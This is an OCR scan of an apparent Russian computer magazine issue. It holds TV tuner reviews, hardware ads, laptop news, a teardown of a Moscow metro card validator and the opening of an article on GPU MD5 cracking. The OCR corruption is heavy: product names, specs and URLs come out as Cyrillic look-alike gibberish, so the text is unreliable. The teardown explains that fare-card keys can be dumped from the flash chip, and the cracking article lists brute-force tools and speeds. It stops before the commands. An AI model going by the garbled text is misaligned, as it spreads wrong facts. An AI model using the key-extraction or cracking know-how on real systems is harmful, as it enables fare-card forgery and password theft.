РЕДАКЦИЯ ВЫРАЖАЕТ БЛАГОДАРНОСТЬЗАПРЕДОСТАВЛЕННОЕНАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИИ ОЛДИ ІѴѴѴѴѴѴ.ОЮІ.Ри.ТЕЛ. 
(4951-221-1 111), МАГАЗИНУ Х-СОМ 5Н0Р (ѴѴѴѴѴѴ.ХС0М-5Н0Р.ІШ, (4951-799-9669), КОМПАНИИ АНТАРЕС (УУ^.АЫТЯЗ.ЯЦ, (4951-748-71 11). 
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т'еггигп 



Список протестированного 
оборудованияД 



АѵегМесІіа АѵегТѴ ОѴІ Вох 1 080І 
АѵегМесІіа НуЬгісІ НХ 
ВеИоШегТѴ Іпіго 
СотргоѴібеотаіеѴівіа ІІ2800Г 
Сотрго Ѵібеотаіе Ѵівіа ІІ750Р 
Ріппасіе РСТѴ РНуЬгісІ Рго Зііск 




3500 руб. 



ІТестовый стенд: 



НоутбукАсегТгаѵеІтаіе 6292-933032Мп 
Процессор: Іпіеі Соге 2 Эио 2500 МГц 
Системная плата: Іпіеі ОМ965 
Память, Мб: 3072 Мб ООР2 667 МГц 
Видеоплата: Іпіеі 6МАХ31 00 
Жесткий диск, Гб: 320 Гб, ВАТА 
ОС: ѴѴІпсІоѵѵв ХР РгоІеввіопаІ. 




АѵегМесІіа АѴегТѴ РѴІ 
Вохіо8оі| 

Технические характеристики^ 



Тип подключения: автономный ТВ-тюнер 

Входы: аудио, 5 -ѴісІео, компонентный, композитный, йѴІ 

Выходы: аудио, ѲѴІ 

Функции: картинка-в-картинке, мультиэкран, таймер записи 

Поддержка разрешений: 720р,ю8оі 
Максимальное разрешение: 1920X1200 
Формат видео: 4 = 3 , 5 = 4 , 1б:9,1б:10 

Пульт Д/У: есть 



АѵегМесІіа НуЬгі сІ НХ| 

Технические характеристики^ 



Тип подключения: гибридный ТѴ -тюнер 
Входы: аудио, 5 -Ѵісіео, композитный 

Выходы: нет 

Функции: картинка-в-картинке, мультиэкран, таймер записи, теле- 
текст, Ііте зЫИ 

Поддержка разрешений: 720р, 1080І 
Максимальное разрешение: 720x576 
Формат видео: 4 = 3 , 16:9 
Пульт Д/У: есть 



О О 




Ключевая особенность свежей модели от старожила рынка ТВ-тюнеров, 
компании АѵегМесІіа, — это поддержка разрешения 1 080І. С небольшим 
экраном ноутбука мы не смогли оценить все преимущества технологии, 
но обладателям больших мониторов, определенно, понравится. ТВ-тю- 
нер автономный: софт отсутствует, а потому не оценивается. Установка 
и настройка при помощи пульта дистанционного управления прошли 
без проблем. На корпусе ТВ-тюнера есть несколько кнопок: переклю- 
чение каналов, регулировка звука, включение питания и активация 
меню. Актуальность этих кнопок под вопросом, так как есть отличный 
пульт Д/У. Кнемутакже никаких претензий — прости понятен, есть все 
необходимые кнопки. 

0 

Заметный минус у этого тюнера лишь один — невозможность верти- 
кальной установки корпуса на столе. В горизонтальном положении 
он занимает немало места. Здесь явно не помешала бы небольшая 
пластиковая подставка. 




«Таким должен быть ТВ-тюнер!» Именно эти слова напрашиваются 
после тестирован ия компактного, но очень функционального девайса 
от АѵегМесІіа. От момента установки маленького ІІ5В-ключа до начала 
просмотра прошло всего несколько минут. Фирменный софт ставит- 
ся за считанные секунды (опытная АѵегМесІіа навострилась делать 
стабильные, функциональные и втоже время простые в использовании 
программы). Крохотный ТВ-тюнерлегко просканировал эфир, нашел 
все доступные программы и сохранил их в таблицу каналов. Каждый 
можно самостоятельно назвать, переназначить на другую цифру, удалить 
ненужные. Меню редактирования каналов максимальноупрощено. Под 
рукой все основные функции программы просмотра. Даже новичок легко 
сможет воспользоваться всеми возможностями! 

0 

Явный минус — можно подключить только одну антенну: либотелевизи- 
онную, либо радио. Собственно, в этом есть своя логика: трудно предста- 
вить маленький ІІ5В-ключ с большим количеством разъемов. Поэтому 
не получится после просмотра ТВ сразу начать слушать радио. 
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Те г гит 






2850 руб. 



Ріппасіе РСТѴІ 
НуЬгісІ Рго БіісТЛ 

Технические характеристики^! 



Тип подключения: гибридный ТѴ -тюнер 
Входы: КОМПОЗИТНЫЙ 

Выходы: нет 

Функции: телетекст, Ііте зЫН 
Поддержка разрешений: 720р, 1080І 
Максимальное разрешение: 720x576 
Формат видео: 4=3. 16:9 
Пульт Д/У: есть 

••••••••00 




Определенно, это самый стильный, компактный и приятный на вид внеш- 
ний ІІ5В-тюнер. Мы почти не сомневались, что Ріппасіе, разработчик 
кучи профессиональных пакетов программ для работы с видео, спра- 
вится с созданием утилиты для просмотра на «отлично». Таки оказа- 
лось. Софт, идущий в комплекте, инсталлируется безлишних проблем и 
вопросов, а рука сама тянется к кнопке сканирования эфира. Все удобно, 
и функционал программы максимально широк. Как мы ни старались, нам 
не удалось найти ни одного недочета в интерфейсе. Качество изображе- 
ния — на высочайшем уровне. 

0 

Разочаровало отсутствие радио-функций. Пульт дистанционного 
управления мал и неудобен. Нам не совсем понятна причина, по которой 
компактные ТВ-тюнеры комплектуются мини-пультом. Ведь очевидно, 
что никто не будет смотреть телевизор при помощи ноутбука в дороге, а 
в стационарныхусловиях переключать каналы и настраивать изображе- 
ние куда удобнее полноценным пультом Д/У. 



Сотрго Ѵігіеотаі е Ѵізіа 1)28ооГ| 

Технические характеристики^ 



Тип подключения: гибридный ТѴ-тюнер 
Входы: аудио, 5 -Ѵійео, композитный 

Выходы: нет 

Функции: картинка-в-картинке, мультиэкран, таймер записи, ііте 

5ІІІІ1 

Поддержка разрешений:720р,Ю8оі 
Максимальное разрешение: 720x576 
Формат видео: 4=3. 16:9 
Пульт Д/У: есть 

••••••0000 




В принципе, это почти полный аналог ІІВВ-тюнера АѵегМебіа НуЬгісІ 
НХ. Модели идентичны потехническим характеристикам, набору 
портов и своим функциональным возможностям. От модели АѵегМесІіа 
ничем не отличалось и качество изображения. У тюнера классная 
цветопередача и отсутствие помех. 

0 

Идущая в комплекте программа нам не понравилась. Установить ее 
на стандартную версию ѴѴІпсІоѵѵвХР удалось лишь со второго раза. 
Пришлось отключитьѴѴІРІ-соединение с интернетом — в противном 
случае установка заканчивалась ошибкой. Помимо основной про- 
граммы пришлосьустанавливатьеще несколько утилит. Самаутилита 
просмотра иногда отказывалась запускаться, выдавая ошибку. Ин- 
терфейстакже не слишком удобный, кнопки в программе маленькие 
и не сразу понятно их назначение. Не очень понравился и внешний 
ИК-порт, который необходимо подключать к отдельному ІІ5В-порту. Во 
время просмотра ТВ твой компьютер или ноутбук потеряют сразу два 
ІІ5В-порта. Рациональным подходом это трудно назвать. 



► 018 
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Беспроводной 
маршрутизатор 802.1 1 N 

со встроенным 
А08І.2+ модемом 



ѴѴІ_-АМ604д 

Беспроводной роутер 
с АБЗБ 2+ модемом 
и коммутатором 4x10/' 



05/.-Л/73 

Высокоскоростной Іпіегпеі 

у вас дома! 




ѴѴЬбООд 



Беспроводной роутер 
со встроенным АБЗІ-2+ модемом, 
коммутатором 4x10/100 
и 2 портами ІІЗВ2.0 



ѴѴІ.-АМ602/4 

Универсальный роутер 

^ с АБЗБ 2+ модемом 

’ * и интерфейсами ІІЗВ и/или І_АЫ 



• Быстрее, чем по проводам! 

Поддержка протокола 802.1 1 п ОгаЙ 2.0 (300Мбит/с), 
полная обратная совместимость с 802.1 1 Ь/д 

• Упрощенная настройка 

автоопределение настроек А08!_ соединения 
Вашего провайдера 

• Совместное использование ІІ8В-устройств 

встроенный сервер печати и сервер РТР/Ыпих ЗагпЬа 

• Адаптирован для работы 

с российскими Іпіегпеі провайдерами 

• Технология А8Ы8 АЮізк 

позволяет создать файловый сервер и делает обмен 
файлами через сеть простым и доступным 



Всемирная гарантия 2 года 



ѵѵѵѵѵѵ.азиз.ги 



тми ш ш^ш 

Горячая линия А51І8: (495) 23-11-999 _ , с .. 

Коек 5оіісі ■ Неагі ТоисНіпд 



Партнеры: Москва (495): БЮРОКРАТ (495) 745-55-11; Коосіоо ТесЬпоІодіез (495) 256-17-31; ОЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-3210; ТРІШТѴ-ЕІ.ЕСТКОМІСЗ ѵѵѵѵѵѵ.ігі-еі.ги; Меіго СазН&Саггу ѵѵшшеіго-сс.ги; Мвидео ѵѵѵуѵѵ.тѵісіео.ги; Месііа Магкі 
ѵіл/ѵѵѵ.тесііатагкі.ги; Техносила ѵѵѵѵѵѵ.ІесИпозіІа.пі; Эльдорадо ѵлотѵ.еИогасІо.ги; Белый Ветер - ЦИФРОВОЙ 730-30-30; ЮМ 5444-333; Неоторг 223-23-23; НИКС 974-33-33; Санрайз 542-80-70; СтартМастер 785-85-55; Формоза 234-21-64; Форум Компьютере 775-77-59; Ф-Центр 105- 
64-47; Тепіоіб Огоир 580-6385; ТРК 642-47-29; Электрон-Сервис 737-44-99; НТ Компьютер 363-93-93; ІІЗИ Сотриіегз 775-82-02; АРКИС (499) 612-96-90; Х-СОМ 7-999-600; Компьютер Маркет 500-03-04. 

С-Петербург (812): КЕЙ 074; Компьютерный Мир 333-00-33; АІІКА Компьютеры 325-69-20; «N3 316-13-60; ТК-плюс 333-15-45; РИК - Компьютере 327-34-10. 

Архангельск: Норланд (8182) 26-90-10; Белгород: Элси (4722) 55-86-11 ; Воронеж: РЕТ (4732) 77-93-39; Владивосток: ЭИЗ (4232) 300-454; Екатеринбург: Трилайн (343) 378-70-70, Белый Ветер Екатеринбург (343) 291-10-00, НТ Компьютер (343) 379-31-68; Жуковский: Байт (248) 7- 
41-38; Иркутск: Комтек-Компьютерз (3952) 258-338; Краснодар: Владос (861)210-10-01; Красноярск: Старком (3912)49-11-11; Махачкала: Фирма АС (8722) 68-06-05; Мурманск: Мега Импекс (81 52) 477-477; Нижний Новгород: ЮСТ (831)225-28-23; Новокузнецк: Титан (3843) 70-38- 
38; Новосибирск: ЗЕТ НСК (383) 346-4842, Техносити (383) 212-53-33, НТ Компьютер (383) 344-99-04; Омск: Компьюмаркет РИТМ (3812) 23-05-05; Петрозаводск: Компания «Р1 » (8142) 781-323; Пермь: НТ Компьютер (342) 237-15-73; Псков: Все для ПК (8112) 72-72-75; Ростов-на- 
Дону: Иманго (863) 232-47-1 8, НТ Компьютер (863) 295-30-20; Солнечногорск: Компьютерный мир (469-26) 4-87-69; Сургут: Компьютерный супермаркет «Первый»; Томск: ИНТАНТ (3822) 56-00-56; Тюмень: Техносити (3452) 26-1 9-72; Уфа: Форте ВД (347) 260-00-00, Кламас (347) 291 - 
21-12; Ярославль: Сеть компьютерных салонов «Фронтекс» (4852) 58-58-58. 



Те-ггигп 




ізіа ІІ750Р 



3200 руб. 



1900 руб. 



[Технические характеристики 



Тип подключения: внешний ТВ-тюнер 
Входы: аудио, аудио, 5-ѴісІео, композитный 
Выходы: аудио, РѴІ 

Функции : картинка-в-картинке, мулыиэкран, таймер записи, Тіте 
5ЫИ 

Поддержка разрешений: 720р, 1080І 
Максимальное разрешение: 720x576 
Форматвидео: 4=3 
Пульт Д/У: есть 



ВеИоШегТѴІпІгоІ 

Технические характеристики:! 



Тип подключения: автономный ТВ-тюнер 
Входы : аудио, 5-ѴісІео, композитный, Ѵ6А 
Выходы: аудио, ѴСА 

Функции : мульти-экран, картинка на рабочем столе 

Поддержка разрешений: 720р, 1 0801, 1 о8ор 
Максимальное разрешение: 1920X1200 

Формат видео: 4=3, 16:9, 16:10 

Пульт Д/У: есть 



О О 



О 




Удачный внешний ІІ5В-тюнер отСогпгро. На момент написания этих 
строк модельтолько начала появляться в продаже, но цена вполне 
конкурентоспособна — всего 1900 рублей. Несмотря на это, новинка 
сохраняет функционал своих «коллег». Тюнер характеризует великолеп- 
ное качество изображения и полное отсутствие помех. Весьма полезно 
и наличие отдельных входов для ТВ и радиоантенн. Тюнерзаключен в 
аккуратный пластиковый корпус синего цвета. Размеры его невелики, 
установить можно как набок, так и вертикально. Или можно прикрепить к 
задней стенке монитора. Отличный пульт Д/У — оченьтонкий, но с боль- 
шим числом функциональных клавиш! Также заявлена полная совмес- 
тимость с ѴѴіпсІоѵѵ5 Мебіа Сепіег. 

в 

Нам не очень понравилось программное обеспечение. Еслиты решишь 
приобрести эту модель, обязательно попробуй программы от сторонних 
производителей. 




Перед нами еще один автономный де вайе, теперь — от компании 
Вебоібег, менее известной, чем АѵегМебіа, нотоже собаку съевшей на 
производстве ТВ-тюнеро в. Первый плюс и явное отличие от моде- 
ли АѵегМебіа — это возможность вертикальной установки корпуса 
тюнера. Оченьудобно:устройствозанимаетминимум места, можно 
даже прикрепить на стену. На самом корпусе расположены несколько 
управляющих клавиш, но в процессе тестирования мыиминепользо- 
вались — пульт Д/У гораздо удобнее. 

0 

Не очень понравился корпус — онпоскрипываетине выглядит, как 
дорогое устройство. Расстроило и отсутствие ОѴІ-выходов, есть только 
устаревшие 0-511 В. Кроме того, в комплекте нет переходника с 0-5 II В 
на ОѴІ. Владельцам современных мониторов придется покупать его 
отдельно. Приятного в этом мало. 



г ВЫВОДЫ 

Все исследованные нами модели продемонстрировали отличное качество 
передачи ТВ-сигнала и практически полное отсутствие помех. Прогресс 
налицо. Несколько лет назад та кое был о возможно только при использо- 
вании лучших и дорогих моделей. Сейчас даже дешевые варианты радуют 
глаз современным телевидением. С учетом оценки качества идущего в 
комплекте программного обеспечения, главный приз редакции получает 
АѵегМесІіа НуЬгісІ НХ — многофункциональный, компактный и удобный 



в работе ІІ5В-тюнер. Когда-то программное обеспечение АѵегМесІіа 
страдало массой недоработок, однако за прошедшее время оно стало 
лучшим на рынке. Уровню модели, как правило, соответствует и ее цена. 
Поэтому «Луч шую покупку» мы вручаем Сотрго Ѵібеотаіе Ѵізіа ІІ750Р. 
ЭтотТВ-тюнер предлагает за минимальную стоимость отличное качество 
и неплохие возможности. Конечно, оценку сильно снижает неудачное 
программное обеспечение, но, сэкономив на цене, потом вполне можно 
потратить час-другой на поиск ПО пт сторонних разработчиков - » - 
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НРНБХ 

Ні§1і-епс1 ноутбуки 
для мобильных 
развлечений 



Играть в свежие гамесы, смотреть Риіі Нй видео, наслаждаться чистым 
многоканальным звуком — нравится всем. Но невозможноже везде тас- 
катьза собой компьютер! Компания НРэто понимаети именно поэтому 
выпустила семейство мощных ноутбуков НР НБХ, каждый из которых 
послужит отличным центром развлечений и просто мощным и удобным 
портативным компом. 

Благодаря красивому титановому корпусу и яркому экрану Вгід НбѴіеѵѵ 
Іпііпііу Бізріау с диагональю 16- или 18.4-дюймов эти мощные развле- 
кательные ноутбуки станут отличными подарками к надвигающимся 
праздникам. Ноуты заряжены по полной: привод Віи-Рау, встроенный 
ТѴ-тюнер, акустическая система АИес Бапвіпд® со встроенным сабву- 
фером, видеокарта МѴЮІАбеРогсе 9600М 6Т. А монитор оборудован 
двойной лампой подсветки, что позволитлегко работать с ноутом даже 
при ярком свете. 



НР ТоисЬЗтаН: І<2500 
Новый моноблок 
с сенсорным дисплеем 



ТоисЬВтагІ — это та к называемый моноблоке сенсорным дисплеем. 
Грубо говоря, это монитор, в который напихали все внутренности от ком- 
пьютера и добавили сенсорную панель. Второе поколениеТоисбВтагІ 
Ю500 было представлено еще в июле, но официальные поставки в 
Россию начались совсем недавно. 

Новые моноблоки оснащаются процессорами Соге 2 ОиоТ5750 (5850) с 
частотами 2 (2,1 6) ГГц и графической картой Іпбеі ѲМАХ31 00 либо ЫѴЮІА 
ВеРогсе 9300М 65. Независимо от модификации моноблоки оборудова- 
ны сенсорным дисплеем диаметром 22 дюйма, ВІиеІооіН-, ЕІЬегпеі- и 
ѴѴІ-РІ адаптерами. 

Втаким монитором компьютер отлично сканаетза телек и прекрасно 
будет себя чувствовать в этой роли — ТѴ-тюнер можно опционально 
включить в поставку. 
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ЯР Міпі 1000 
Килограммовый 
нетбук от НР 
за 400 баксов 



[Р Раѵіііоп йѵ3500 

Мощный 13.3” 
ноутбук с дизайном 
«жидкий металл» 



Нетбук НР Міпі 1000 весит один килограмм, по тол щи не меньше дюйма и 
стоит всего $400. При всем при этом является полноценным компьюте- 
ром на базе Іпіеі Аіогп N270 1.6 ГГц, который™ сможешь всегда носить 
с собой в сумке или рюкзаке. По заверениям НР, они очень за морочи- 
лись с клавиатурой и добились того, ее размеры у Міпі 1000 составляют 
92% от размера клавиатуры стандартного ноутбука. То есть клава у него 
почти такая же, как и у обычного ноута. В общем, вполне себе приятный 
и качественный нетбук, имеющий экран со стандартным разрешением 
1024x600 и полным набором коммуникаций: ЕІИегпеі-разъемом, двумя 
ІІ5В-портами, поддержкой ѴѴІ-РІ и ВІиеіооОі. 

Помимо Міпі 1000 черного цвета НР также поставляет модификацию с 
ярко-красной расцветкой, которая понравится твоей подруге. 



Если для тебя очень важен внешний вид ноутбука и необычный, нестан- 
дартный дизайн тебя привлекает, то Раѵіііоп сІѵЗбОО придется тебе по 
вкусу. Корпус этого ноута сделан в концепции «жидкий металл» и выгля- 
диттак, как будто он отлит из бронзы. Также его традиционно украшает 
приятный глазу тонкий орнаментальный рисунок. 

Если же отбросить внешний вид, то останется вполне добротная машинка 
с 13,3-дюймовым дисплеем, камнем Соге20ио 2,26 ГГц, тремя гигами 
памяти и винчестером ЗАТАобъемом 320 Гб. 

Вместе с ноутом, правда, придется купить Винду Висту, но что не сдела- 
ешь ради хорошего ноутбука? 
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(КОПАЕМСЯ ВО ВНУТРЕННОСТЯХ ВАЛИДАТОРА' 

__ 

Большинство из нас ежедневно пользуются услугами метро, и, наверное, 
каждому хотя бы раз приходила в голову мысль заглянуть внутрь одного 



І из устройств, которые д нем и ночью неподкупно Шфаняют вход в подземку. 
Мечты сбываются! Разбирать м ы будем не к акую-нибудь мелочь, а самый 
что ни есть настоящий терминал проверки бесконтактных карточек. 



г подопытный ДЕВАЙС 

Взглянув на фотографии, ты сразу поймешь, о чем речь. Да, это тот самый 
аппарат, который виситна стене в каждом вестибюле метро. Именно кнему 
мы подходим с карточкой после неудачной попытки пройти через турникет 
— и наблюдаем беспристрастное: «ПОВТ. ПРОХОД 7 МИН.». Конечно, это 
не головка валидатора турникета, но скажу по секрету, ее устройство мало 
чем отличается от нашего подопытного. Внешне это просто пластиковый 
ящик. Интерфейсы связи с пользователем — бесконтактный считыватель 
карт, спрятанный за передней частью корпуса, и оригинальный дисплей на 
красных светодиодах: визитная карточка всех систем метрои«МосГорТран- 
са.» На задней части аппарата «растет» разъем, с помощью которого терми- 
нал присоединяется клокальной сети вестибюля, и рычагзамка, которым 
устройство крепится к установочному кронштейну. Сам замок расположен в 
нижней части устройства и, в отличие от многих приборов подобного класса, 
это — единственная защита от посягательства с применением грубой силы. 

С другой стороны, оно и понятно: валидатор висит не абы где, и при любой 
попытке посягнуть на казенное имущество за спиной нерадивого наруши- 
теля моментально окажется парочка милиционеров, и песенка злодея будет 
спета (яе спрашивай , откуда у нас подопытный образец, — Прим, 
ред). Что ж, с экстерьером терминала все более-менее понятно, поэтому 
приступим к самому интересному. Берем в руки отвертку и... 

Н ПЛАТФОРМА СЛЕВА — ПЛАТФОРМА СПРАВА 

Вывинтив четыре винта, находящиеся сзади устройства, и разделив его кор- 
пус на две половинки (как скорлупу грецкого ореха), извлекаем содержимое. 



Все внутренности терминала размещены на двух с половиной платах. 
Что осталось на «половинке», понятно — это дисплей и несколько 
светодиодных индикаторов красного и зеленого цветов. Рассмотрим 
внимательнее оставшиеся две. На одной из них сразу бросается в 
глаза огромное количество всевозможных микросхем, МИКРОСХЕ- 
МИЩ и микросхемочек, куча рассыпухи и еще много всего интересно- 
го. Стало быть, это главная плата устройства. Поглядим, что она собой 
представляет. 

Самый большой «камень» на этой плате — Моіогоіа МС68332 (это 
центральный процессор). Точнее говоря, это серьезный 32-битный 
микроконтроллер (именно микроконтроллер, так как он несет на борту 
определенное количество периферии типа ІІАПТ и ѴѴаІсбсІод-таймера). 
Платформа получилась старенькая, но проверенная временем. Та к как 
уэтого МК нет встроенной памяти программ, а память данных ничтожно 
мала, то рядом с камнем прописаны четыре микросхемы ОЗУ (всего 
512 Кб) и одна флешка (тоже на 512 Кб). Во флеш-памяти пролегает 
управляющая программа, а в оперативе — служебка и логи. Автомат 
сохраняет всю информацию о приложенных к нему картах до тех пор, 
пока не отдаст ее по сети центральномуузлу. Здесь же, в ОЗУ, лежат и 
стоп-листы (касается только турникетных валидаторов) и криптогра- 
фические ключи для проверки валидности билетов ультралайт (ключи 
доступа к секторам карточек Мііаге Сіаввіс зашиты во флеш -памяти). 

На случай потери магистрального питания оперативка «забатареена» 
достаточно вместительным элементом на 3 вольта. При отсутствии 
питания он позволит хранить данные в оперативной памяти более 3-х 
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ПРИЖИМНЫЕ 

ПРОКАТНЫЕ 

РОЛИКИ 



МАГНИТНАЯ 

ГОЛОВКА 



РОЛИК 
ТЕРМОПРИНТЕРА 



ПЕРЕДАЧИ ДАННЫХ, 
ПРИСОЕДИНЕННЫЙ КПЛАТЕ 
УСИЛИТЕЛЕЙ И КОМПАРАТОРОВ 



КАБЕЛИ, ИДУЩИЕ ОТ 
ЭЛЕКТРОДВИГАТЕЛЯ 
И СОЛЕНОИДА 



ШЛЕЙФ ТЕРМОПРИН- 
ТЕРА С РАЗЪЕМОМ 



мощный ШАГОВЫЙ элект- 
родвигатель, СПРЯТАННЫЙ 
ПОД ШЛЕЙФОМ ТЕРМОПРИН- 
ТЕРА 



ЕНОИД, ПРИЖИМАЮЩИИ 
ГОЛОВКУ ТЕРМОПРИНТЕРА К 
БИЛЕТУ 
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ДИСПЛЕЙ ПРЕОБРАЗОВАТЕЛЬ И НЕ РАСПАЯННАЯ КЛАВИА- 



ПИТАНИЯ ДЛЯ МОДУЛЯ ТУРА — ЯРКИЙ ПРИМЕР ТОГО, 

СЧИТЫВАТЕЛЯ ЧТО ПЛАТФОРМА ОБЩАЯ 



месяцев. Этотже элемент«бэкапит» и часы реального времени. 

В общем-то, это была самая главная часть аппарата. Все остальное 
на плате относится к блоку питания (кстати, устройство питается от 
24 вольт], обвесу камней, интерфейсам с внешним миром (только 
поглядите на этот милый разъем с обозначением «Ыеімогк») и 
оставшейся периферией — считывателем и дисплеем. 

К КОНТАКТ БЕСКОНТАКТА 

Бесконтактный считыватель, установленный на другой плате, — это 
«второе сердце» терминала. Именно ради него, можно сказать, и 
создавалась вся система. Сам считыватель — это отдельный модуль 
производства компании Сетріив. 

Для справки: контора занимается контактными и бесконтактными 
технологиями в банковской сфере и в сфере платежных систем. 
Считыватель работает по известной беспроводной технологии 
МІІаге (МІкгоп РАРЕ-соІІесііоп Зувіет], которая была разработана и 
поддерживалась маленькой австрийской фирмой МІкгоп. Затем, в 
1998 году, технологию с потрохами выкупила Рбііірв ветісопбисіогв 
(ныне МХР], которая и по сей день ее продвигает. Так как на считы- 
вателе неб ылони ед иного упоминания о Рбііірв, а на всех микро- 
схемах красовалось гордое «МІкгоп», можно предположить, что 
этот образец очень старый, возможно, середины 90-х. На мысли о 
древности также наводит здоровенный экранированный радио- 
блок и куча микросхем в крупных корпусах. Сейчас такие штуки 
реализуются на одной МС от Рбііірв в незатейливом корпусе 50-20. 
И ведь, смотри-ка, все это до сих пор работает :). 

Из оставшегося на плате железа — программируемая логика, кото- 
рая управляет работой считывателя и дисплея; несколько интер- 
фейсных микросхем (расширители портов], да небольшой преобра- 
зователь питания для нужд считывателя. 

г О СОВМЕСТИМОСТИ ВИДОВ 

Я больше чем уверен, чтоутебя промелькнула мысль, какже похо- 
жи эти терминалы на аппараты, которые стоят за передней дверью 
автобусов, троллейбусов и трамваев. Я скажу даже больше. Они 
похожи не только внешне, но и внутренне. Те же контуры плат, та же 
платформа, почти идентичное расположение элементов... 

Платы с дисплеем и считывателем отлично взаимозаменяются. 
Дисплей показывает все верно, ну, правда, считыватель «чуть-чуть 
не работает» (что и не мудрено — в метрошном варианте стоиттакой 
мастодонт, а в автобусном — вполне современный МРНС531]. И, 



разумеется, в автобусном терминале присутствует, помимо прочего, 
считыватель магнитных билетов. Он составляет где-то 70% всего 
веса автобусного валидатора. Этим считывателем управляет от- 
дельный небольшой 8-битный микроконтроллер (тоже Моіогоіа], 
который на плате терминала метро просто не распаян (как и разъем 
«Мадбеаб» для подключения головок и датчиков магнитного счи- 
тывателя, а также разъем и электроника управления термопринте- 
ром]. 

Это наводит на мы ель об унифицированной аппаратной платфор- 
ме, которая разрабатывалась еще давно, с расчетом на долгое 
существование и разумное обрастание новым функционалом. Вот и 
получается, что от поколения к поколению платформа не меняется и 
несет с собой вечным грузом как все прелести, так и все фундамен- 
тальные оплошности, которые совершили разработчики. 

ОСТОРОЖНО, ДВЕРИ ЗАКРЫВАЮТСЯ... 

Конечно, от этих ошибок уже никуда не убежать, есливкорнене 
изменить всю конструкцию. С нынешними представлениями мы 
можем сказать, что «надо было делать все на нормальных 8-битных 
МК, — тогда устройство получилось бы проще и в разы безопас- 
нее». По крайней мере, нельзя было бы просто выпаять микросхему 
флеш-памяти и считать ее на программаторе, без проблем пос- 
мотрев в дампе ключи А и В для карт Мііаге СІавБІс (студенческие, 
социальные и проездные]. По сути, ключи — единственная защита 
на пути подделки этих документов... Ноне стоит забывать, что в то 
время у разработчиков не было такого широкого выбора удобных, 
функциональных, быстрых и безопасных микроконтроллеров, какой 
есть сегодня. Бедолагам приходилось разрабатывать на тех плат- 
формах, какие были доступны. 

Вывод: на текущий момент вся платформа потенциально уязвима. 
Это означает, что почти любой подкованный в электронике хакер 
сможет выудить из такого терминала строго конфиденциальную ин- 
формацию, и, возможно, даже использовать ее в незаконных целях. 
Конечно, определенные программные ухищрения могут усложнить 
жизнь взломщикам, но нетак, какусложнила бы полная невозмож- 
ность считать программу и дамп оперативки из устройства. 

Поэтому я желаю и «Метрополитену», и «МосГорТрансу» скорейшей 
смены платформы на современную и более безопасную. 

А всех хакеров, стремящихся попробовать силы на этих системах, 
предостерегу: подобные «попытки» строго преследуются по 
закону! зс 
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Х300 - МАСТЕР ИГРЫ 



> Новый ноутбук Оозгпіо Х300 
с процессорной технологией 
Іпіеі® Сепітіпо® 2 всем своим 
агрессивным видом дает 
понять, что он заряжен 
на беспрецедентную 
по реалистичности игру. 



> Что дальше? 

ѵѵѵѵѵѵ.дозтіо.ги 

Информационный центр: 

8 - 800 - 100 - 05-05 [города РФ] 
8 - 495 - 983 - 05-05 [Москва) 
ѵѵѵѵѵѵ.ІозЫЬа.сот.ги 



Іпіеі, логотип Іпіеі, Сепігіпо, Сепітіпо Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными 
знаками корпорации Іпіеі в США и других странах. На правах рекламы 






АНДРЕЙ КОМАРОВІ 



Некоторое время назад Сеть начала п]эостожишеть заметками о па^ллель 
шх вычислениях на видеокарте. Своего рода сенсация: вычислительных^ 



\ современных видеокарт, которые приоОретает каждый люои- 

Т У. I Щ ‘і ШГЛЛ^Ж ІГЖР^ 

ать, оказывается вполне достаточно, чтобы организовать слож 



ель поиг 



ендеринг изображений 



[технологии вроде Кау Тгасіп% и даже взломать алгоритмы ши 



рс_гопе 
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В ФЕВРАЛЬ НАУЧИЛ МЕНЯ ЖИТЬ, 

ЯНВАРЬ НАУЧИЛ МЕНЯ ЖДАТЬ! 

Еще в начале февраля 2007 года на всеобщее обозрение был 
представлен первый готовый комплект инструментов для доступа 
к инструкциям графического ускорителя. СІШАТооІкИ/СІШАЗОК 
(тогда еще в бета-исполнении) позволяла реализовать на языке 
программирования Си алгоритмы, выполняющиеся на графических 
процессорах ускорителей ОеРогсе восьмого поколения и старше. 

В качестве АРІ используются транслированные на С выражения, 
которые без проблем стало возможным задействовать в любых 
приложениях. Отныне программисту было нужно лишь обзавес- 
тись соответствующим ЗйК, а также скачать с официального сайта 
КІѴІЕІІА драйвер СІША, который связывается с ОігесіХ, 0реп6І_ и 
С-компилятором для ВРІІ. Замечу, что именно N VI □ ІА является 
разработчиком и обладателем патента на эту технологию, хотя она 
и поддерживается другими производителями, например, АН. Для 
работы теоретически подойдут модели Х1600, Х1800, и Х1900, одна ко 
я настоятельно рекомендую XI 900. В отличие от Х1800.Х1900 при- 
меняет не процессор Е520/П530, а П580. Он дает большой прирост 
производительности со своими 48 шейдерными конвейерами, 
используемыми для вычислений. 



Важное требование — видеокарта должна обладать, как минимум, 512 
Мб памяти — в противном случае ОРІІ-клиентсильнозагрузитмашину 
(бывают и исключения: например, XI 950Рго РСІ-Е с 256 МБ памяти по- 
казывает вполне неплохую производительность). Для удобства кодинга 
можно найти специальную среду разработки СІЮАТооІкК (не путать с 
С1ЮА30К). Она включаете себя: 

• пѵсс (специальный «нативный» компилятор С); 

• библиотеку ВБА5 для работы слинейной алгеброй (например, в 
приведенныхтам примерах есть аналоги теста БІМРАСК, используемого 
по сей день для выявления вычислительных мощностей суперкомпьюте- 
ров; по назначению является «узким» клоном Іпіеі МаіЬ Кегпеі ЫЬгагу); 

• ЕРТ-библиотеку (отвечаетза операции фильтрации цифровых изобра- 
жений с использованием результатов преобразований Фурье); 

• профайлер; 

• и пока еще сыроватый отладчик. 

В ГОТОВЫЕ РАЗРАБОТКИ НА США, ИЛИ РАСПРАВА НАД М05 

О том, что технология работает и работает классно, можно судить уже 
сейчас. На основе СІЮА были разработаны десятки утилит. Приве- 
дем наиболее интересные для нас, а именно — годные для взлома 
хэшей МР5: 
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СРІ! 



№мН: 2161 
Кру ІГйШкЕІ! 



Тсглі : 245,164 ММЛ-.-Н 'іеі; 
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Один из самых быстрых бесплатных С1ЮА тсІ5-кракеров — обрати внимание на время перебора 






• ЬагвѴѴР 0.8 у/г 15). 

На данный моментна пѴісІіа 96000Т/С2Р 3 ГГцСІЮА-версия 
проверяетЗбО миллионов ключей в секунду, а 55Е2 — 108 
миллионов. Для работы крайнежелательно использовать 
64-битную операционку, хотя 32-битная версия утилиты 
также доступна. Синтаксис для запуска следующий: 

